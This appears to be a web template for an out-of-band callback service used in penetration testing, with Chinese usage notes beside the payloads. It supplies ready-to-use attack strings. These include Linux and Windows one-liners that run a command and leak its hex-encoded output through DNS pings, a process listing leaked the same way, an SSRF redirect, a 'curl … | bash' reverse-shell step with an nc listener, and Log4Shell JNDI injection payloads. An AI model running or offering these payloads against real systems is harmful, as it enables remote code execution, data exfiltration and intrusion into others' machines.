| # | Type | Record | IP | Req_body | Time |
|---|---|---|---|---|---|
| {{ index }} | {{ record.type }} | {{ record.subdomain }} | {{ record.ip }} | {{ record.reqbody }} | {{ record.time }} |
CMD="{{dns_command}}";RExSP="$(eval "$CMD"|hexdump -v -e '/1
"%02X"')";R=$(tr -dc 'a-z0-9' </dev/urandom | head -c 4 | sed
's/^[\n\r]*//g');i=0;for s in $(echo $RExSP|fold -w 63);do
i=$((i+1));ping -c 1 "$s.$i.$R.cmd.{{domain}}">/dev/null;done
{{dns_command}} 1> execfile7 && certutil -encodehex -f execfile7
execfile7.txt 4 && (for /f "Delims=: Tokens=1-2" %a in ('findstr
/n . execfile7.txt') do (for /f "Tokens=1-16" %c in ('echo
%b')do ping -nc 1
%c%d%e%f%g%h%i%j%k%l%m%n%o%p%q%r.%a.%RANDOM%.cmd.{{domain}})) &&
del execfile7 && del execfile7.txt
for /F %i in ('wmic process get Name ^| findstr .exe') do ping -nc 1 %i.cmd.{{domain}} > nul
{{ record.content }}
callback.red/ssrf/10.10.1.1/
=> $ curl callback.red/ssrf/10.10.1.1/ < HTTP/1.1 302 Found < Server: nginx/1.20.1 < Date: Sun, 16 Jan 2022 15:41:36 GMT < Content-Type: text/html;charset=utf-8 < Content-Length: 0 < Connection: keep-alive < Cache-Control: must-revalidate, no-store < Location: http://10.10.1.1/
callback.red/sh4ll/{{ip_address}}:{{ip_port}}
受害者机器:
=> $ curl callback.red/sh4ll/{{ip_address}}:{{ip_port}} | bash
or $ curl callback.red/sh4ll/{{ip_address}}:{{ip_port}} | sh
你的VPS:
=> $ nc -lvvp {{ip_port}}
=> listening on [any] {{ip_port}} ...
connect to [{{ip_address}}] from fbi.gov [127.0.0.1] 46958
rmi://jndi.callback.red:5/{{domain.split('.')[0]}}/
ldap://jndi.callback.red:5/{{domain.split('.')[0]}}/
路径后可以添加任何字符或留空 便于识别区分 如:
${jndi:ldap://jndi.callback.red:5/{{domain.split('.')[0]}}/test}
${jndi:rmi://jndi.callback.red:5/{{domain.split('.')[0]}}/hello}